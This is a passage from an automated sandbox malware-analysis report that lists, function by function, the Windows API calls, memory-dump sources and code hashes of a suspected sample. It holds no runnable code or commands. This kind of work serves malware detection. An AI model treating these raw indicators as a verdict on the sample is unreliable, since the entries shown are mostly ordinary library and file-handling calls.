        • Opcode ID: d4315836d5a1856141b36470df76c9f1cbf7c4b826061340bf62233488c3cdc1
        • Instruction ID: 87127f8346106f9a73a0b0e0082d1f59bd07c3ac80e0114a2408b692079764a3
        • Opcode Fuzzy Hash: d4315836d5a1856141b36470df76c9f1cbf7c4b826061340bf62233488c3cdc1
        • Instruction Fuzzy Hash: 2B31DF31209325EFDB04CF10E898BAF77A5FB80715F04451CF9916B290CB74A998CBA2
        Function 0012B542 Relevance: 4.6, APIs: 3, Instructions: 55COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 0012D68B: _wcslen.LIBCMT ref: 0012D691
        • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B569
        • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B59C
        • GetLastError.KERNEL32(?,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B5B9
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CreateDirectory$ErrorLast_wcslen
        • String ID:
        • API String ID: 2260680371-0
        • Opcode ID: afe967379bf1080b6131eb92c4a2322acb286e45d7255e39f17683f9b6b9e520
        • Instruction ID: 8458922629351a2d004c1214698b4a6e2b85c35c9853a03952f5a48259e8fb7e
        • Opcode Fuzzy Hash: afe967379bf1080b6131eb92c4a2322acb286e45d7255e39f17683f9b6b9e520
        • Instruction Fuzzy Hash: C701D871208270AAEF256B70BCC5BEE335C9F19785F144415FA02DE0D1EB64DAD287A1
        Function 0014CA43 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
        Download Yara Rule
        APIs
        • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0014CA68
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Info
        • String ID:
        • API String ID: 1807457897-3916222277
        • Opcode ID: aaaca97bdb79731f87e8ec019236fb0a5aff93894dc4cc2a08c6f905effbef60
        • Instruction ID: 233c88a8866a1fb818b5c978ed3d83ace51e3a780ad8ea125e62f32e5eaeb6e0
        • Opcode Fuzzy Hash: aaaca97bdb79731f87e8ec019236fb0a5aff93894dc4cc2a08c6f905effbef60
        • Instruction Fuzzy Hash: AF413A7050528C9EDF26CF68CC85AF6BBA9DF15304F2404EDE58A87152E335AA458FA0
        Function 0014C11C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,62E85006,00000001,?,?), ref: 0014C18D
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: String
        • String ID: LCMapStringEx
        • API String ID: 2568140703-3893581201
        • Opcode ID: dbbb5f946f6b71a86219898f20c5638364a31dedea0cbec74f5ee79e8aa9a59d
        • Instruction ID: 6a058c7527ae0acd61ed160da5355e83667eee222bd67fcfc876ad8d54bda2d1
        • Opcode Fuzzy Hash: dbbb5f946f6b71a86219898f20c5638364a31dedea0cbec74f5ee79e8aa9a59d
        • Instruction Fuzzy Hash: C201D332541219FBDF129FA0DC01DEE7FA2EF08751F014515FE182A171CB7299B1AB90
        Function 0014C0BA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
        Download Yara Rule
        APIs
        • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,0014B71F), ref: 0014C105
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CountCriticalInitializeSectionSpin
        • String ID: InitializeCriticalSectionEx
        • API String ID: 2593887523-3084827643
        • Opcode ID: 5ce9044096dd1394f6f47bb5db910c21aa8a6f5d59a78875477f9cef96bc1812
        • Instruction ID: 7d5a56e6bb0d8bd56ea61feebcd6cfe471c119934789f6048cd9104ebcb49f8e
        • Opcode Fuzzy Hash: 5ce9044096dd1394f6f47bb5db910c21aa8a6f5d59a78875477f9cef96bc1812
        • Instruction Fuzzy Hash: 9AF0B431A41218FBCF129F91DC02CAE7FA1DB28751F004015FD152B170CFB159919B90
        Function 0014BF5F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Alloc
        • String ID: FlsAlloc
        • API String ID: 2773662609-671089009
        • Opcode ID: 18226a07d474a27e00f87796594135c3b753e8ecf3b682d1be582f3ee015081a
        • Instruction ID: 65f911494a92595c5f21d295d1a967d281f5dfb86a9201ffedf020a620ce35d2
        • Opcode Fuzzy Hash: 18226a07d474a27e00f87796594135c3b753e8ecf3b682d1be582f3ee015081a
        • Instruction Fuzzy Hash: D1E05530A45318FBC201ABA09C0297E7B90CB98B22F410016FC087A660CF706D858ACA
        Function 0014CDA0 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 0014C96B: GetOEMCP.KERNEL32(00000000,?,?,0014CBF4,?), ref: 0014C996
        • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0014CC39,?,00000000), ref: 0014CE14
        • GetCPInfo.KERNEL32(00000000,0014CC39,?,?,?,0014CC39,?,00000000), ref: 0014CE27
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CodeInfoPageValid
        • String ID:
        • API String ID: 546120528-0
        • Opcode ID: 55c3d81fd82be121c91bb60c937996a755d3c873a2deac1d140a923fe4d1ec77
        • Instruction ID: 96d7301870557725c31a824157270eaf002cad0a5a1de51f62b6e1a8fb5f7b39
        • Opcode Fuzzy Hash: 55c3d81fd82be121c91bb60c937996a755d3c873a2deac1d140a923fe4d1ec77
        • Instruction Fuzzy Hash: 8E516471E02202AFDB658F75C880ABBBFE6EF41304F14446ED0969B172E7399946CBD0
        Function 0012ACD4 Relevance: 3.1, APIs: 2, Instructions: 134COMMON
        Download Yara Rule
        APIs
        • SetFilePointer.KERNEL32(000000FF,?,?,?,-000018C0,00000000,00000800,?,0012ACB0,?,?,00000000,?,?,00129C8B,?), ref: 0012AE3A
        • GetLastError.KERNEL32(?,?,00129C8B,?,?,?,-000018C0,?,-00002908,00000000,-00000880,?,00000000,?,?,00000000), ref: 0012AE49
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ErrorFileLastPointer
        • String ID:
        • API String ID: 2976181284-0
        • Opcode ID: 190d03b06f103fb738cb1adb70be1c8bea43a07a61adc26877efd76806b32d3f
        • Instruction ID: c03ecf9cc97256007379e8f78a1f218d4bc8fa9ee40efc5059c8844b3ad97f19
        • Opcode Fuzzy Hash: 190d03b06f103fb738cb1adb70be1c8bea43a07a61adc26877efd76806b32d3f
        • Instruction Fuzzy Hash: 6841473520436DCFD728AFA4F8846BA73A5FF58322F900529E84687E51D770DCA58B93
        Function 0013A59B Relevance: 3.1, APIs: 2, Instructions: 113COMMON
        Download Yara Rule
        APIs
        • ShowWindow.USER32(00000000,00000005,?,?,?,?,0013A7F6,00000000,?), ref: 0013A699
        • SetWindowTextW.USER32(00000000,00000000), ref: 0013A6A3
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Window$ShowText
        • String ID:
        • API String ID: 1551406749-0
        • Opcode ID: 828543eb6dd5f06436d644df04c3bc7c9207ef508826b804cb59e298c6660a8b
        • Instruction ID: e3f6074e457a033db2981c5b5654e39cce551163f3f570d2085d51cc0922faad
        • Opcode Fuzzy Hash: 828543eb6dd5f06436d644df04c3bc7c9207ef508826b804cb59e298c6660a8b
        • Instruction Fuzzy Hash: 4D31AC71204726AFC700DF65EC8491ABBE9FF48704F09011EF6859B660CB71BC81CB92
        Function 0014CBD7 Relevance: 3.1, APIs: 2, Instructions: 91COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 0014A505: GetLastError.KERNEL32(?,00163070,00145972,00163070,?,?,00145271,00000050,?,00163070,00000200), ref: 0014A509
          • Part of subcall function 0014A505: _free.LIBCMT ref: 0014A53C
          • Part of subcall function 0014A505: SetLastError.KERNEL32(00000000,?,00163070,00000200), ref: 0014A57D
          • Part of subcall function 0014A505: _abort.LIBCMT ref: 0014A583
          • Part of subcall function 0014CCFE: _abort.LIBCMT ref: 0014CD30
          • Part of subcall function 0014CCFE: _free.LIBCMT ref: 0014CD64
          • Part of subcall function 0014C96B: GetOEMCP.KERNEL32(00000000,?,?,0014CBF4,?), ref: 0014C996
        • _free.LIBCMT ref: 0014CC4F
        • _free.LIBCMT ref: 0014CC85
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: _free$ErrorLast_abort
        • String ID:
        • API String ID: 2991157371-0
        • Opcode ID: 27f7b8cf3b9cd5cf7be34baa6e5f22fd843d59422522420c4574ab8a588e2b02
        • Instruction ID: fba1cc2061c8f157091ee6cfd591633c099ee392cdf1cc188bf663874f25ad2b
        • Opcode Fuzzy Hash: 27f7b8cf3b9cd5cf7be34baa6e5f22fd843d59422522420c4574ab8a588e2b02
        • Instruction Fuzzy Hash: 61312931901104EFDB54DFA8D980B6EB7F5EF54321F2640ADE4089B2B1EB725D40DB90
        Function 0012B032 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON
        Download Yara Rule
        APIs
        • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00127ED0,?,?,?,00000000), ref: 0012B04C
        • SetFileTime.KERNEL32(?,?,?,?), ref: 0012B100
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: File$BuffersFlushTime
        • String ID:
        • API String ID: 1392018926-0
        • Opcode ID: 4d32c80c67826fb18d95af08c08da7bd8a1bfdd3c9269233d04b4aefb5653227
        • Instruction ID: 0571cdb3d0de7fec024e9bb791a5593eab1bfc5c0e56e2efdcd01e6ea68080ed
        • Opcode Fuzzy Hash: 4d32c80c67826fb18d95af08c08da7bd8a1bfdd3c9269233d04b4aefb5653227
        • Instruction Fuzzy Hash: DD21FD3124C351EFC716DE65E8D2AABBBF8AF95304F08491CF8E183181D329E91C9766
        Function 0012A8CE Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
        Download Yara Rule
        APIs
        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,0012B1B7,?,?,001281FD), ref: 0012A946
        • CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,0012B1B7,?,?,001281FD), ref: 0012A976
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: CreateFile
        • String ID:
        • API String ID: 823142352-0
        • Opcode ID: e99847e7e4aed40555258fa76f7004e188ade76388767766a6f02e2a2333d0e7
        • Instruction ID: ed3fd9f2ad30c5e793a66d167eea02a1bc4c5413ae4e0acbe3bc9180079d1b03
        • Opcode Fuzzy Hash: e99847e7e4aed40555258fa76f7004e188ade76388767766a6f02e2a2333d0e7
        • Instruction Fuzzy Hash: 7221FFB1404354AFE7308A26DC88BB776DCEF59329F910A19FAD5C21C1C374A8C58672
        Function 00144CF2 Relevance: 3.1, APIs: 2, Instructions: 67libraryloaderCOMMONLIBRARYCODE
        Download Yara Rule
        APIs
        • FreeLibrary.KERNEL32(00000000,?,001840C4,?,?,?,00144EE6,00000004,InitializeCriticalSectionEx,00157424,InitializeCriticalSectionEx,00000000,?,00144C9D,001840C4,00000FA0), ref: 00144D75
        • GetProcAddress.KERNEL32(00000000,?), ref: 00144D7F
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: AddressFreeLibraryProc
        • String ID:
        • API String ID: 3013587201-0
        • Opcode ID: 9b4de947795375c8dbd42b2f429902e61307ab8908274d21b4863632ef8c3bf8
        • Instruction ID: 14150d1776e293fd5afc8fce66f5ee1f23a11120973f8e500111aea5f2fa3810
        • Opcode Fuzzy Hash: 9b4de947795375c8dbd42b2f429902e61307ab8908274d21b4863632ef8c3bf8
        • Instruction Fuzzy Hash: E811B635A00515DFCF26CFE4EC84A9A73A5FF667507250169E905DB264EB30DD41CBD0
        Function 0012B110 Relevance: 3.1, APIs: 2, Instructions: 56COMMON
        Download Yara Rule
        APIs
        • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000001), ref: 0012B157
        • GetLastError.KERNEL32 ref: 0012B164
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: ErrorFileLastPointer
        • String ID:
        • API String ID: 2976181284-0
        • Opcode ID: eef97b8949bef8e7536d411b0a2f556162e5ddffad0c88769c3e98162fc24f64
        • Instruction ID: aebd3d351170acd41051dcd5ea5be36b17d0fdeae81f1accd838938f0cbfa043
        • Opcode Fuzzy Hash: eef97b8949bef8e7536d411b0a2f556162e5ddffad0c88769c3e98162fc24f64
        • Instruction Fuzzy Hash: 0811E131604720EBE7298B28FC94BA7B3E9BB04360F604628E1A2935D0E770ED75C750
        Function 0014A694 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON
        Download Yara Rule
        APIs
        • _free.LIBCMT ref: 0014A6B5
          • Part of subcall function 0014A7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0014DBDC,00000000,?,001480A1,?,00000008,?,0014A861,?,?,?), ref: 0014A820
        • HeapReAlloc.KERNEL32(00000000,?,?,?,?,001630C4,0012187A,?,?,00000007,?,?,?,001213F2,?,00000000), ref: 0014A6F1
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Heap$AllocAllocate_free
        • String ID:
        • API String ID: 2447670028-0
        • Opcode ID: d387a5918bd4e39fd8f9b46f9d4098b86989421bf9d1ec200186348884ce02bc
        • Instruction ID: 998cbbd04e5d6ce43c434542629b4bc9ab17a33a6ee25040c0a7f33f091908b6
        • Opcode Fuzzy Hash: d387a5918bd4e39fd8f9b46f9d4098b86989421bf9d1ec200186348884ce02bc
        • Instruction Fuzzy Hash: D3F0F632681111A7CB213A26AC00F6B37189FD1BB1F9B4016F8159A0B0DF30CC4195A7
        Function 001323B6 Relevance: 3.0, APIs: 2, Instructions: 33COMMON
        Download Yara Rule
        APIs
        • GetCurrentProcess.KERNEL32(?,?), ref: 001323C3
        • GetProcessAffinityMask.KERNEL32(00000000), ref: 001323CA
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000163000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000165000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000184000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564851233.0000000000185000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_1_2_120000_HSZXPMB7kS.jbxd
        Similarity
        • API ID: Process$AffinityCurrentMask
        • String ID:
        • API String ID: 1231390398-0
        • Opcode ID: 1fda615ea62c2ac1d4aeeba16928b7ae1e9555a514252f1c4f17cd235a3493ef
        • Instruction ID: 964c59f3a5bfa8f0d3e99aa6207247a3212db9d40c54fd23d79bad2ad87562a8
        • Opcode Fuzzy Hash: 1fda615ea62c2ac1d4aeeba16928b7ae1e9555a514252f1c4f17cd235a3493ef
        • Instruction Fuzzy Hash: 67E09233B00205A7CF0997A49C458EB72ECFB58209B248175E503D3500EA78DD4546A0
        Function 0012B8E6 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
        Download Yara Rule
        APIs
        • SetFileAttributesW.KERNEL32(?,00000000,00000001,?,0012B5B5,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B8FA
          • Part of subcall function 0012CF32: _wcslen.LIBCMT ref: 0012CF56
        • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0012B5B5,?,?,?,0012B405,?,00000001,00000000,?,?), ref: 0012B92B
        Memory Dump Source
        • Source File: 00000001.00000002.1564744220.0000000000121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
        • Associated: 00000001.00000002.1564726375.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564774065.0000000000154000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000001.00000002.1564792040.0000000000160000.00000004.00000001.01000000.00000003.sdmpDownload File
